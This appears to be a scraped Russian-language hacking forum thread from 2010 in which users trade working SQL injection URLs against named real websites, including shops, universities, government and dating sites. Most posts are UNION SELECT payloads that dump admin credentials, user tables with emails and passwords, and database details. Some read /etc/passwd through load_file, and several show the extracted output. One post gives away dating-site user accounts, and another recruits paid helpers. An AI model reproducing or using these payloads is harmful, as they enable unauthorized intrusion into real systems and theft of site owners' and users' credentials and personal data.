http://www.wacs2000.org/wacs2009_beta/en/culinary_programs/competition.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,unhex(hex(group_co ncat(TabLe_NamE))),27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46+from+information_sche ma.tables+group+by+table_schema+limit+2,1+--+
http://www.fischergold.de/index.php?id=-51+union+select+1+--+
http://www.alice-miller.com/readersmail_en.php?lang=en&nid=-2927+union+select+1,2,3,4+--+&grp=0110
http://www.presidence.bf/listArticles.php?sid=-10+union+select+1,2,concat_ws(0x3a3a,username,pass word),4+from+pbf_users+--+&page=1&articlesPerPage=5
http://southindianpost.com/gallery/index.php?page=1&category=1.1&photoId=-2+union+select+1,2,3,4,5,6,7,8,9,10+--+
http://satorisalon.ru/satlist.php?idp=-145'+union+select+1,2,3,4,5,6,7,8,9+--+
http://www.ivanenko.name/showpart.php?idp=-3'+union+select+1,2,3,4,5,6,7,8,9+from+information _schema.tables+--+
http://www.matuls.pl/index.php?IDP=1&Lng=1&IDKategoria=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,User Pass,UserName,UserEmail),9+from+CMSUsers+limit+0,1 +--+
http://www.panterafilms.ru/portf/work.php?idp=-65+union+select+1,2,3,4,5,6,7,8,9,10+from+cns_conf ig+--+
http://www.lorentzcenter.nl/lc/web/2010/375/info.php3?wsid=-1+union+select+1,2,3,4,5+--+
Database name: lc
Database version: 4.1.22
Database user: web@lcserver.lorentzcenter.nl
http://www.azez.ru/ind.php?pn=2&id_typ=-239+union+select+1,2,3,4,5,6,version(),8,9,10,11,1 2,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28--
sql 5
pr 5
тиц 10
mailbrush
24.01.2010, 23:53
http://yugo-vostok.org/?sec=artical&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8/*ugo@localhost@localhost:ugo:5.0.32-Debian_7etch11-log
[+]Printable field: 2
[+]Vuln URL: http://www.tiboschtrading.nl/details.php?id=-54+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5--
[+]Printable field: 5,6
[+]Vuln URL: http://www.pascal-tie.com/production/details.php?id=-44+UNION+SELECT+1,2,3,4,5,6,7,8,9--
[+]MySQL Info: murakami@localhost:4.1.20:tie_com:binjredhat-linux-gnu
[+]Printable field: 2,4
[+]Vuln URL: http://www.infinspb.ru/index.php?id=-217+UNION+SELECT+1,2,3,4,5,6--
[+]MySQL Info: mega470_mysql@10.1.90.228:4.1.22-log:mega470_infin:binjportbld-freebsd6.2
GinTonic
25.01.2010, 00:38
http://www.edifier.com.ua/news.php?task=showfull&id=-246+and+1=0+union+select+1,2,3,4,concat_ws(0x3a,ve rsion(),user(),database()),6,7,8--
5.0.44-log:u_edifierU@localhost:edifierU
http://www.lv/list.php?id=-1+UNION+SELECT+1,2--
http://www.babynamefacts.com/namelists/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
http://dl.game.21cn.com/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22--
http://atsta.net/list.php?id=-1+UNION+SELECT+1,2,3,4--
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,3,4--
http://robassales.co.za/product-list.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
http://www.99dq.com/hyqqbxdclw/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
http://www.hipickbuy.com/list.php?id=-1+UNION+SELECT+1--
http://www.castlight.com.au/list.php?id=-1+UNION+SELECT+1--
http://www.palmasta.com/list.php?clang=-1+UNION+SELECT+1--
http://www.megamarkets.com.au/shopping/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16--
http://www.bulgarianpropertysale.co.uk/list.php?region_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25%E2%80%8B,26,27--
http://www.ecoogimall.com/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
http://www1.hfut.edu.cn/organ/wsbgs/ch/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
http://www.belldavispitt.com/practice.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
http://mmc.awesomemath.org/practice.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
http://www.nashashmi.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4--
http://www.lvnoon.co.uk/image-viewer.php?Id=-1+UNION+SELECT+1,2,3--
http://central.nightglass.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--
http://sturgisrallydaily.com/sturgis_rally_news/history/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
http://www.jakeabramson.com/Viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
http://www.postautobody.com/restoration/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://www.weir-tscs.com/articles-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
http://www.darkcrystalis.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4--
http://www.pegplay.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4--
http://scientificcomtech.com/news-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5--
http://www.barneybags.co.uk/page-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
http://www.teaseumcams.com/viewer.php?id=-1+UNION+SELECT+1,2--
http://www.hardbodyvideo.com/viewer.php?id=-1+UNION+SELECT+1,2--
http://www.thefalesteam.com/buy.php?ID=13+UNION+SELECT+1,2,3,4,5,6,version(),8 ,9,10,11,12+--+
Version:5.0.77
User:fales_web@localhost
Database:fales
http://www.pridepools.com/display.php?pid=-10+UNION+SELECT+1,2,3,4
Database Version: 5.0.67.d7-ourdelta-log
Database name: pride
User name: pride@72.167.131.222
http://community.novaboard.net/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+1,2,3,4,concat_ws(0x0A,version(), user(),database()),6,7,8,9+--+
5.0.87-community-log
localcom_communi@localhost
localcom_nbsupportforums
http://community.clantigercommunity.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1%29+union+select+1,2,3,4,concat_ws%280x0A,versio n%28%29,user%28%29,database%28%29%29,6,7,8,9+--+
5.0.87-community-log clantige_communi@localhost clantige_community
http://sstb.angelog.nl:81/forum/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1%29+union+select+1,2,3,4,concat_ws%280x0A,versio n%28%29,user%28%29,database%28%29%29,6,7,8,9+--+
5.0.45 root@localhost sstb_forum
http://www.matthew-alan.co.cc/_development/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1%29+union+select+1,2,3,4,concat_ws%280x0A,versio n%28%29,user%28%29,database%28%29%29,6,7,8,9+--+
5.0.87-percona-highperf ispyderz@lotus.x10hosting.com ispyderz_ispyderz
http://livingtheprofs.nl/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1%29+union+select+1,2,3,4,concat_ws%280x0A,versio n%28%29,user%28%29,database%28%29%29,6,7,8,9+--+
5.0.32-Debian_7etch11-log livingtheprofs_@srv137.one.com livingtheprofs_
http://aksuakademi.com/forum/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1%29+union+select+1,2,3,4,concat_ws%280x0A,versio n%28%29,user%28%29,database%28%29%29,6,7,8,9+--+
5.0.45-community-nt akademi@localhost aksuakad_
Zombi ****
29.01.2010, 17:54
http://www.caentechnologies.com/nuclear/news.php?id=1+union+select+1,2,3,group_concat(tabl e_name),5,6,7,8,9,10+from+information_schema.table s--
http://www.neolitica.ru/index.php?r_id=-1+UNION+SELECT+1,2,3,4,5,6--
http://zooclub.ru/article.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--
http://www.kidsmile.ru/news/detail.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6--
http://www.autoprava.ru/fototop/model.php?id=616%27+UNION+SELECT+1,2,3,4,user(),6, 7,8,9,10,11,12,13,14,15,16+LIMIT+1,1+--+
можно похакать девченку в гелике)
DezMond™
30.01.2010, 16:12
http://www.echoes.org.uk/magazine.php?id=-358'+union+select+1,2,3,4,5+from+information_schem a.tables+--+
http://pakistantimes.net/pt/detail.php?newsId=-1108+union+select+1,2,table_name,4,5,6,7,8,9,10,11 +from+information_schema.tables+--+
http://balicarholiday.com/daftar_tour.php?kategoriID=-2+uNIon+sELEct+1,2,tAble_name,4,5+from+information _schema.tables+--+
http://makeupartistindonesia.net/detail_event.php?eventID=-9418+uNIon+select+1,2,3,4,5,concat_ws(0x3a3a,name, password,is_private,email,peer,is_admin),7,8,9,10, 11,12,13,14,15,16+from+users+--+&vendorID=11370418
http://www.stomp.it/default.php?idref=-81+union+select+1,concat_ws(0x3a3a,userid,paswid)+ from+,4,5,6+from+admin+--+
http://www.matteite.com/en/matteite.php?idCat=51+union+select+1,concat_ws(0x3 a3a,login,password),3,4,5,6+from+admin+--+
http://www.belmedpreparaty.com/prices/registr1.php?rub_id=-25+union+select+1,user()+--+&%F1ountry_id=1
http://www.namo.in.th/detail_product.php?productid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22+from+namo_user_level+--+
http://www.cpacdsign.com/detail_product.php?productid=-119+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,mb_i d,mb_login,mb_password,mb_email,mb_accept,mb_statu s,mb_surname,mb_education,mb_province),8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22+from+cpac_member+--+
http://www.cameroon-info.net/cin_rubriques.php?rub_id=-757+union+select+1,2,table_name,4,5,6,7,8,9,10,11, 12+from+information_schema.tables+--+
http://www.italiepunt.nl/shop/new_index.php?adviceselection=-72+union+select+1,2+from+information_schema.tables +--+
http://www.johnraffertyphotography.com/gallery.php?view_image=141&view_category=-17+union+select+user()+--+&start_img=0
http://www.docteurclaude.fr/rubrique.php?RUB_ID=-4+union+select+1,2,3,4,5,6,7,8,9+/*+
http://bodyspace.net/artigos.php?rub_id=-138+union+select+1,2,3,4,concat_ws(0x3a3a,username ,user_password,user_passchg,user_pass_convert,user _email,user_login_attempts,user_type,group_id,user _permissions,user_perm_from),6+from+forum2_users+l imit+7,1+--+
http://www.e-boat.it/default.php?idref=36&ida=227+uNIon+sELect+1,2,3,4,5,6,7+--+
http://cube3.securesites.net/_ios_seacube/default.php?idref=19&ecom=11&ecomid=31+union+select+1,2,3,4,5,6,7,8,9+--+
http://www.gavazzeni.it/index.php?idref=420&mainid=431+union+select+1,2,3+--+&open=420&PHPSESSID=9946bcf29a0b0ad8d69799d3055b352a
http://www.leclaireurhebdo.com/rubrique.php?PAGE_ID=6&RUB_ID=-1+union+select+1,group_concat(table_name),3+from+i nformation_schema.tables+--+
http://www.alice-miller.com/articles_en.php?lang=en&nid=-101+union+select+1,group_concat(table_name),3,4,5+ from+information_schema.tables+--+&grp=11
http://www.essaygifts.co.za/product-list.php?id=-43+union+select+1,2,3,4,5,6+from+information_schem a.tables+--+
http://www.rsd-electronic.com/en/product-details.php?art=-4175+union+select+1,2,3,4,5,6,7+--+
http://www.energypluspumps.eu/en/cesky/product_lists/product-list.php?id=53+union+select+1,2,table_name,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18+from+information_s chema.tables+--+
http://depolamp.ru/buy.php?id=-13+union+select+1,2,table_name,4,5,6,7,8,9,10,11+f rom+information_schema.tables+--+&make=show
http://jtime.ru/buy.php?ID=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
http://www.wisedentist.com/d2d/browse.php?bcat=-6+union+select+1,username,password,4,5,6,7,8+from+ admin+--+
http://www.educ.msstate.edu/events/detail.php?id=-669+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39--
nemaniak
31.01.2010, 11:54
joomlaextensions.co.in PR-4
http://joomlaextensions.co.in/index.php?template=system&option=com_jeeventcalendar&view=event&Itemid=155&event_id=-1%22+UNION+ALL+SELECT+1,version%28%29,user%28%29,d atabase%28%29,5,6,7,8+FROM+jos_users%23
version:5.0.87-community
database:joomlaex_joomextenstions
user:joomlaex_jextens@localhost
pescanova.com PR-5
http://www.pescanova.com/contenido.php?idmenu=40&id_noticia=6+union+select+1,concat_ws%280x3a,versi on%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8, 9,10,11,12,13,14+--+
5.0.33-log:mql005-pesca@blade05-03.asp.mundo-r.com:BD276183005
http://www.kai3fan.net/wiki/version.php?id=-4+union+select+1,2,3,4,group_concat(0x0b,column_na me),6+from+information_schema.columns+where+table_ name=0x6B61695F75736572
kai_user::id,name,passwort,jobids,realname,time,ra nk,mail,lastvisit,signatur
MySQL 5.0.26
http://www.kai3fan.net/wiki/version.php?id=-4+union+select+1,2,3,4,group_concat(0x0b,id,0x3a,n ame,0x3a,passwort),6+from+kai_user+--
panel's:
http://www.kai3fan.net/pma/index.php - phpMyAdmin
http://www.kai3fan.net/admin/ - admin panel
http://www.kai3fan.net/community/index.php?action=log - FORUM
.:[melkiy]:.
01.02.2010, 00:42
PR: 6
_http://physics.anu.edu.au/nuclear/personnel.php?id=(1,2)=(select*from(select+name_co nst((select+concat_ws(0x3a,version(),user())),1),n ame_const((select+concat_ws(0x3a,version(),user()) ),1))a)
PR: 7
_http://www.stat.washington.edu/people/people.php?id=-75+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,6,7,8,9,10+--+
Extremal
01.02.2010, 02:12
http://www.script-php.info/index.php?link=9&id=-45+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u ser(),version(),database())
database:yandexn_scripts@localhost
version:5.0.67-community
user:yandexn_scripts
http://runetbusiness.com//index.php?link=4&id=-5+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er(),version(),database())
database:yandexn_nn@localhost
version:4.1.22-standard
user:yandexn_runetbusiness
http://www.insk.ru/news_view.php?news_id=-15+union+select+1,concat(login,0x3a,passwd,0x3a,em ail),3+from+users+--+
Вся база данных юзеров с емайлами :)
http://www.paramountcenter.org/stage.php?id=-432+union+select+1,2,concat(name,0x3a,password),4, 5,6,7,8,9,10,11,12,13,14,15,16+from+admin+limit+1
nemaniak
02.02.2010, 13:13
pescanova.it PR-2
http://www.pescanova.it/news.php?section=90&action=show&id=-27+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6+--+
4.1.20:admin_pescan@web010101:pescan
oasibioresearchfoundation.org PR-2 Blind
http://www.oasibioresearchfoundation.org/index.php?patologia=11+and+substring%28version%28% 29,1,1%29=4
EndLeSSDre@M
02.02.2010, 18:44
http://www.lamongols.com/components/com_jcalpro/cal_popup.php?extmode=view&extid=9999'+union+select+1,2,concat(convert(name+u sing+latin1),0x3a,convert(password+using+latin1)), concat(user(),0x3a,version(),0x3a,database()),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25+from+jos_users+--+
version: 5.1.42
user: anugaasc_lamon@localhost
database: anugaasc_lamongols
При запросе вежливо выдает имя и пасс админа в md5 + salt
eDU-DU
http://www.cs.umd.edu/local-cgi-bin/als/confupdate.pl?confid=-410+union+select+1,2,3,4,5,6,7,8,9/*
Version: 5.0.45
User: cgi_user@clavin.cs.umd.edu
http://www.litencyc.com/php/speople.php?rec=true&UID=-2709+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23+--+
Database name: db158348773-7
Database version: 5.0.45-7
Database user: dbo158348773@localhost-7
http://www.chrisjordan.com/current_set2.php?id=11'+and+1=2+UNION+SELECT+1,2,3 ,4,5--+'
database:cjordanwebdata
version:4.1.22-max-log
user:cjordanwebdata@97.74.24.67
http://brunswickncyardsales.com/links.php?cat=-18/**/union/**/all/**/select/**/666,666,666,concat_ws(0x3a,member_name,member_pass word,email)kaMtiEz,@@version,666,666,666,666,666,6 66,666,666,666,666,666,666,666,666,666,666,666,666 ,666,666,666,666,666/**/from/**/members--
http://www.dreamscity.net/dlil/links_showcat.php?id=3%20and%201=0%20UNION%20SELEC T%201,concat(username,0x3a,password),3,4%20from%20 admin
nemaniak
03.02.2010, 21:49
jenniferlynn.com PR-2
http://www.jenniferlynn.com/gig-guide/gigs?event_id=-27+union+select+%201,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8
5.0.51a-24+lenny2-log:jlynn@localhost:jlynn
highervibrationliving.com
http://highervibrationliving.com/wordpress/?page_id=19&event_id=-123+union+select+%201,concat_ws%280x3a,version%28% 29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 2
8
5.0.67.d7-ourdelta-log:hig0933807564279@97.74.24.135:hig0933807564279
http://talismanov.net/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()), 3,4,5,6,7+from+information_schema.tables--
http://dedmorozov.net/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()), 3,4,5,6,7+from+information_schema.tables--
Два с одной базы
5.0.45:u15364@localhost
Я больше не буду баянить=)
http://www.isf-roma.org/page_index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
database:isfdb
version:4.0.24_Debian-10-log
user:isfanonymous@localhost
http://www.gripperbybauer.com/viewItem.php?id=-1+UNION+SELECT+1,2,3,4--
database:grippers
version:5.0.37-log
user:grippers@localhost
http://www.kinkadegalleries.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:kinkad
version:4.0.27-log
user:kinkad@localhost
http://www.historicflyingclothing.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:hfcc
version:5.0.22-Debian_0ubuntu6.06.10-log
user:hfcc@ds6139.dedicated.turbodns.co.uk
http://www.rzmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:rzmilitaria
version:5.0.22-Debian_0ubuntu6.06.10-log
user:rzmilitaria@ds6139.dedicated.turbodns.co.uk
http://www.regimentals.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
database:regimentals
version:4.1.19
user:regimentals@81.21.79.188
http://www.theoldbrigade.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
database:theoldbrigade
version:4.1.19
user:theoldbrigade@81.21.79.188
http://www.hiscoll.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:hiscoll
version:5.0.22-Debian_0ubuntu6.06.10-log
user:hiscoll@ds6139.dedicated.turbodns.co.uk
http://www.bluebellmilitaria.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:bluebell
version:5.0.22-Debian_0ubuntu6.06.10-log
user:bluebell@ds6139.dedicated.turbodns.co.uk
http://www.pastgloriesmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:pastglories
version:5.0.22-Debian_0ubuntu6.06.10-log
user:pastglories@ds6139.dedicated.turbodns.co.uk
http://www.kinkadegalleries.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:kinkad
version:4.0.27-log
user:kinkad@localhost
http://www.regimentals.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
database:regimentals
version:4.1.19
user:regimentals@81.21.79.188
http://www.homefrontcollection.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:homefront
version:5.0.22-Debian_0ubuntu6.06.10-log
user:homefront@ds6139.dedicated.turbodns.co.uk
http://glamourofpearls.com/site/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--
database:glamourofpearls_com
version:4.0.27
user:glamourofpearls@localhost
http://www.lastreich.co.uk/viewitem.php?id=-1+UNION+SELECT+1,2,3--
database:lastreich
version:5.0.22-Debian_0ubuntu6.06.10-log
user:lastreich@ds6139.dedicated.turbodns.co.uk
http://www.adfmilitaria.com/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5--
database:adfmilitaria
version:5.0.22-Debian_0ubuntu6.06.10-log
user:adfmilitaria@ds6139.dedicated.turbodns.co.uk
http://mycommissionbid.com/bid/viewitem.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
database:mybid
version:5.0.22-Debian_0ubuntu6.06.10-log
user:mybid@ds6139.dedicated.turbodns.co.uk
http://www.heel.com.ua/index.php?view=news&id=-487+UNION+SELECT+1,2,CONCAT%28Version(),Database() ,User()),4,5,6,7,8+--+
Database Version: 5.0.51a-24+lenny2-log
Database name: heelezTH
User name: u_heelezTH@localhost
http://www.memorial-komi.org/news.php?n=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11+--+
Database name: 1gb_x_memor8cf
Database version: 5.0.51a-community-nt-log
Database user: 1gb_x_memor8cf@81.176.226.50
sqlinjector
04.02.2010, 16:21
Вот решил еще одну инъекцию ру сайта выложить
http://www.postsoviet.ru/page.php?pid=-85+union+select+1,2,3,4,group_concat%28user%28%29, 0x3a,database%28%29,0x3a,version%28%29%29,6,7,8,9, 10,11,12,13,14,15,16--
user: u12625_postsov@10.9.11.66
DataBase: u12625_postsov
Version: 5.0.67-log
shell_c0de
05.02.2010, 01:15
RU shop's
http://gps-k.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.interiorportal.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.pianino.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.freesound.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.velomastera.ru/shop/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.maxpaintball.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.paintballworld.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://hwdecor.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.realshop.lv/show_cat2.php?order=name&catid=&grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.sambolessons.borec.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.allmaster.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.topi-top.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://inet-mag.com.ua/show_cat2.php?cou=v&grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://shindaiwa.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.stamps-shop.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.podokonnik.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://svt-i.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.infostend-shop.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
http://www.licom-moscow.ru/show_cat2.php?grid=-1+union+select+concat_ws(char(58),username,passwor d)+from+admin
Одминко www.site/admin/
http://reviews.techloop.net/review.php?id=-1+Union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,version(),27,databa se(),29,user(),31,32,33,34,35,36,37,38,39,40,41+--+
version: 5.0.67
database: techloop_db
user: techloop_db@localhost
http://www.nawaonline.com/home.php?id=-2/**/union/**/select/**/1,concat%28username_admin,0x3a,password_admin%29,3 ,4/**/from/**/admin_log_cp--
http://www.alzoma.net/home.php?id=-2/**/union/**/select/**/1,concat%28username_admin,0x3a,password_admin%29,3 ,4/**/from/**/admin_log_cp--
http://www.renegaderecon.com/review.php?id=-1+union+select+1,2,3,4,5,6,7,8+--+
database:renegaderecon
version:4.1.14-Debian_5-log
user:renegaderecon@salt.dreamhost.com
Водка:
http://www.vodkabaikal.ru/gallery.php?pacode=13&phcode=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),v ersion(),database()))),3,4,5,6
root@localhost:4.1.10a:baykal
file_priv=Y --->
http://www.vodkabaikal.ru/gallery.php?pacode=13&phcode=-1+union+select+1,load_file(0x2f6574632f70617373776 4),3,4,5,6
Тоже водка:
http://visota.artinside.ru/foto_uch.php?code=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user() ,version(),database()))),4,5,6,7,8,9,10,11,12,13,1 4,15
u22850@10.10.223.212:5.0.67-log:u22850
http://vladimirmorozov.ru/portfolio/index.php?id_parent=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,us er(),version(),database()))),6,7,8/*
mvstudio_vm@lex.hc.ru:4.1.18:wwwmvstudioru_vm
http://dfrealty.ru/showhousecart.php?code=224+and+ascii(substring(ver sion(),1,1))=53--
chr(53) == '5'; ---> пятая ветка
P.S. Все сайты одной студии, дырявы, как решето.
http://dirac.phys.ncku.edu.tw/stats/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user%28%29--
5.1.37-1ubuntu5
.:[melkiy]:.
06.02.2010, 01:43
PR: 0
ТИЦ: 10
_http://www.playonline.com.ua/game.php?id=208)+union+select+1,2,concat_ws(0x3a,v ersion(),user(),database()),4,5,6,7,8,9+--+
whynotbar
06.02.2010, 13:09
http://aodaihanghai.vn/news_detail.php?lang=&menu=23&id=-93%20UNION%20ALL%20SELECT%201, 2,3,4,5,6,7,8,9,10,11,12,13--
Web Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
Powered-by: PHP/5.2.8
Current DB: hangctl_adhh
Tables :
config,dangnhaphethong,dienthoai,dondathang,ech,gi oithieu,hethong,info,lang,lienhe,luottruycap,menu_ news,menu_quangcao,menu_sanpham,menu_sanpham_cap1, msn,nhomtin,quangcao,sanpham,skype,tbl_group,tintu c,tuvan,useronline,xdmt,yahoo
http://www.societatedurabila.ro/index.php?id=9+union+select+concat_ws(0x3a,version (),user(),database(),@@version_compile_os)
Database Version: 4.1.22-standard
Database name: holcim_new_en
User name: doru@localhost
Os: pc-linux-gnu
nemaniak
06.02.2010, 19:28
flirtdosug.ru PR-2 ТИЦ-10
http://flirtdosug.ru/onlinetest/tests.php?id=-1+union+select+1,2,concat_ws%280x3a,version%28%29, user%28%29,database%28%29%29,4,5+--+
5.0.26-log:promocom_test@localhost:promocom_test
auth_root
06.02.2010, 20:35
Дэйтинг DE,крайне востребован на данный момент.
www.single-basar.de
http://www.single-basar.de/profiles.php?id_unternehmen=-112+union+select+count(email),2,3,4,5,6,7,8,9,10,1 1,12,13+from+users--+&Branche=&Bundesland=
Пятая ветка, таблицы и поля сдампить самому, кому надо =) Мало людей, всего 531 человек.
www.flirtpool.de
http://www.flirtpool.de/go4/thema.php?id=-31795+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,id ,name,email,passwort),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26+from+foren_accounts/*
Тут поболее, 10,589 юзеров. Халява,дарю =)
А®ТеS
Будь добр, стукни плз. в пм с номером аськи. Необходима твоя консультация в некоторых вопросах.Не бесплатно конечно+предоставлю возможность зарабатывать неплохо на постоянке,при минимуме временных затрат.Один не справляюсь.
Любо кто нибудь из мониторящих тему,с опытом и регой. Нужен 1 человек.Рекоммендации, отзывы и т.д. предоставлю в аську при необходимости.
http://jeffherbeck.com/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,concat_ws(0x203a20,version(), user(),host,user,password,file_priv),load_file(0x2 F6574632F706173737764),6+from+mysql.user+--+
5.0.77 : root@localhost : localhost : root : : Y
DezMond™
10.02.2010, 17:03
buychaosmen.com pr2
http://buychaosmen.com/product_info.php?products_id=-768'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16+from+information_schema.tables+--+
videogamesplus.ca pr4
http://www.videogamesplus.ca/pollbooth.php?op=results&pollid=-173+union+select+1+--+
archive.ketchikandailynews.com
http://archive.ketchikandailynews.com/pollBooth.php?op=results&pollID=-41+union+select+unhex(hex(id)),2,3,4+from+users+--+
discountcandleshop.com pr4
http://www.discountcandleshop.com/product_info.php?products_id=-2528+union+select+1+--+
hobbycenter.by pr4
http://www.hobbycenter.by/pollbooth.php?op=results&pollid=-8+union+select+1+--+&page=127'&language=ru'
abreathforlife.org
http://www.abreathforlife.org/fundraising_view.html?ItemID=-15'+union+select+1,2,3,4,5,6,7,8,9,10,11+from+info rmation_schema.tables+--+
bimbibo.it pr5
http://www.bimbibo.it/sections.php?op=viewarticle&artid=-238+union+select+1,2,3,concat_ws(0x3a3a,aid,name,p wd),5,6+from+authors+limit+2,1+--+
startrek.pl pr4
http://www.startrek.pl/pollBooth.php?pollID=-36+union+select+concat_ws(0x3a3a,aid,name,email,pw d,radminsuper),2+from+nuke_authors+--+
bis-nk.ru
